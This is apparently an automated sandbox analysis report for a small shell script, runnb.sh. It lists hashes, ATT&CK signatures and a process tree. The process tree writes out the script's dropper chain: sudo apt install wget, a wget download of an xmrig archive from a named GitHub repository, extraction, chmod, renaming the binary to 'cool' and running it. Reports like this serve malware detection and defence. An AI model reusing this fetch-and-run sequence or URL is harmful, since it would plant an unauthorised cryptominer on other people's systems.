Analysis
max time kernel: 51s
max time network: 53s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 30/10/2024, 13:06
Static task: static1
Behavioral task: behavioral1, sample runnb.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2, sample runnb.sh, resource debian9-armhf-20240611-en
Behavioral task: behavioral3, sample runnb.sh, resource debian9-mipsbe-20240611-en
Behavioral task: behavioral4, sample runnb.sh, resource debian9-mipsel-20240611-en
General
Target: runnb.sh
Size: 213B
MD5: a1189543e2f98f6696c6d857b899ab0a
SHA1: 30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256: a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512: 472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 1 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid 767    Process chmod

Abuse Elevation Control Mechanism: Sudo and Sudo Caching (1 TTPs, 1 IoCs)
Abuse sudo or cached sudo credentials to execute code.
pid 705    Process sudo

Reads CPU attributes (1 TTPs, 2 IoCs)
description                  ioc                               Process
File opened for reading      /sys/devices/system/cpu/online    exim4
File opened for reading      /sys/devices/system/cpu/online    exim4

Reads runtime system information
description                  ioc                               Process
File opened for reading      /proc/filesystems                 dpkg
File opened for reading      /proc/filesystems                 dpkg
File opened for reading      /proc/filesystems                 mv
File opened for reading      /proc/filesystems                 sudo
File opened for reading      /proc/sys/kernel/ngroups_max      sudo
File opened for reading      /proc/self/fd                     sudo
File opened for reading      /proc/sys/kernel/ngroups_max      sendmail
File opened for reading      /proc/sys/kernel/ngroups_max      sendmail
File opened for reading      /proc/filesystems                 dpkg
File opened for reading      /proc/filesystems                 tar
File opened for reading      /proc/self/stat                   sudo
File opened for reading      /proc/self/fd                     apt
File opened for reading      /proc/filesystems                 dpkg
File opened for reading      /proc/self/fd                     apt

Writes file to tmp directory (8 IoCs)
Malware often drops required files in the /tmp directory.
description                       ioc                               Process
File opened for modification      /tmp/fileutl.message.ueS1Tj       apt
File opened for modification      /tmp/fileutl.message.khLB3B       apt
File opened for modification      /tmp/fileutl.message.SYpnjZ       apt
File opened for modification      /tmp/fileutl.message.EjbMVs       apt
File opened for modification      /tmp/fileutl.message.5kH4KV       apt
File opened for modification      /tmp/fileutl.message.FM4QZg       apt
File opened for modification      /tmp/fileutl.message.X6KWVX       apt
File opened for modification      /tmp/fileutl.message.JAGxbL       apt
Processes
/tmp/runnb.sh  [cmd: /tmp/runnb.sh]  PID:704
  /usr/bin/sudo  [cmd: sudo apt install wget]  PID:705
    - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
    - Reads runtime system information
    /usr/sbin/sendmail  [cmd: sendmail -t]  PID:718
      - Reads runtime system information
      /usr/sbin/exim4  [cmd: /usr/sbin/exim4 -Mc 1t67WX-0000Ba-U9]  PID:735
        - Reads CPU attributes
    /usr/sbin/sendmail  [cmd: sendmail -t]  PID:721
      - Reads runtime system information
      /usr/sbin/exim4  [cmd: /usr/sbin/exim4 -Mc 1t67WX-0000Bd-Tl]  PID:734
        - Reads CPU attributes
    /usr/bin/apt  [cmd: apt install wget]  PID:724
      - Reads runtime system information
      - Writes file to tmp directory
      /usr/bin/dpkg  [cmd: /usr/bin/dpkg --print-foreign-architectures]  PID:731
        - Reads runtime system information
      /usr/bin/dpkg  [cmd: /usr/bin/dpkg --print-foreign-architectures]  PID:742
        - Reads runtime system information
  /usr/bin/apt  [cmd: apt install wget]  PID:762
    - Reads runtime system information
    - Writes file to tmp directory
    /usr/bin/dpkg  [cmd: /usr/bin/dpkg --print-foreign-architectures]  PID:763
      - Reads runtime system information
    /usr/bin/dpkg  [cmd: /usr/bin/dpkg --print-foreign-architectures]  PID:764
      - Reads runtime system information
  /usr/bin/wget  [cmd: wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]  PID:765
  /bin/tar  [cmd: tar xvf xmrigtar.tar.gz]  PID:766
    - Reads runtime system information
  /bin/chmod  [cmd: chmod +x xmrig]  PID:767
    - File and Directory Permissions Modification
  /bin/mv  [cmd: mv xmrig cool]  PID:768
    - Reads runtime system information
  /tmp/cool  [cmd: ./cool]  PID:769
Network
MITRE ATT&CK Enterprise v15
Downloads